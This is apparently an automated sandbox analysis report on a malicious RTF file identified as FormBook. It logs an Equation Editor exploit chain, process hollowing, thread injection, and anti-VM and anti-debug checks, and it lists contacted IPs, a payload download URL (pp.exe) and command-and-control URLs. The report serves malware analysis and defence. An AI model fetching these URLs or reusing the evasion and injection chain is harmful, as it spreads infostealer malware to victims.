Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM_3
Source: Yara match File source: 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2105488822.00000000021A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2492, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2296 Thread sleep time: -420000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2296 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1692 Thread sleep time: -50254s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2364 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2880 Thread sleep time: -46000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2768 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 824 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: explorer.exe, 00000007.00000002.2400913887.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.2114083954.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000000.2114119554.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
Source: explorer.exe, 00000007.00000000.2114083954.0000000004234000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000007.00000000.2114083954.0000000004234000.00000004.00000001.sdmp Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 00000007.00000000.2114003133.00000000041DB000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000007.00000000.2107221018.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0040ACD0 LdrLoadDll, 6_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008D26F8 mov eax, dword ptr fs:[00000030h] 6_2_008D26F8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F826F8 mov eax, dword ptr fs:[00000030h] 9_2_01F826F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 146.148.194.209 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.0.232.118 80 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\Public\vbc.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: B30000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000 Jump to behavior
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' Jump to behavior
Source: explorer.exe, 00000007.00000002.2401194206.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.2401088908.0000000000B50000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000002.2401194206.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.2401088908.0000000000B50000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.2400913887.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.2401194206.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.2401088908.0000000000B50000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 321301 Sample: fqwBU8MyzT.rtf Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 41 www.opalthemovie.com 2->41 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus / Scanner detection for submitted sample 2->59 61 Multi AV Scanner detection for dropped file 2->61 63 14 other signatures 2->63 11 EQNEDT32.EXE 12 2->11         started        16 WINWORD.EXE 336 20 2->16         started        18 EQNEDT32.EXE 2->18         started        signatures3 process4 dnsIp5 43 103.207.38.170, 49165, 80 VNPT-AS-VNVNPTCorpVN Viet Nam 11->43 37 C:\Users\user\AppData\Local\...\pp[1].exe, PE32 11->37 dropped 39 C:\Users\Public\vbc.exe, PE32 11->39 dropped 83 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->83 20 vbc.exe 11->20         started        file6 signatures7 process8 signatures9 65 Multi AV Scanner detection for dropped file 20->65 67 Machine Learning detection for dropped file 20->67 69 Writes to foreign memory regions 20->69 71 2 other signatures 20->71 23 RegSvcs.exe 20->23         started        26 RegSvcs.exe 20->26         started        process10 signatures11 73 Modifies the context of a thread in another process (thread injection) 23->73 75 Maps a DLL or memory area into another process 23->75 77 Sample uses process hollowing technique 23->77 79 Queues an APC in another process (thread injection) 23->79 28 explorer.exe 23->28 injected 81 Tries to detect virtualization through RDTSC time measurements 26->81 process12 dnsIp13 45 auctionpros.club 162.0.232.118, 49166, 80 NAMECHEAP-NETUS Canada 28->45 47 www.sgbanfang.com 146.148.194.209, 49167, 80 HENGTONG-IDC-LLCUS United States 28->47 49 www.auctionpros.club 28->49 85 System process connects to network (likely due to code injection or exploit) 28->85 32 wlanext.exe 28->32         started        signatures14 process15 signatures16 51 Modifies the context of a thread in another process (thread injection) 32->51 53 Maps a DLL or memory area into another process 32->53 55 Tries to detect virtualization through RDTSC time measurements 32->55 35 cmd.exe 32->35         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.0.232.118
unknown Canada
22612 NAMECHEAP-NETUS true
146.148.194.209
unknown United States
26658 HENGTONG-IDC-LLCUS true
103.207.38.170
unknown Viet Nam
45899 VNPT-AS-VNVNPTCorpVN true

Contacted Domains

Name IP Active
auctionpros.club 162.0.232.118 true
www.sgbanfang.com 146.148.194.209 true
www.auctionpros.club unknown unknown
www.opalthemovie.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.auctionpros.club/glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri true
  • Avira URL Cloud: safe
unknown
http://www.sgbanfang.com/glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri true
  • Avira URL Cloud: safe
unknown
http://103.207.38.170/pp.exe true
  • Avira URL Cloud: safe
unknown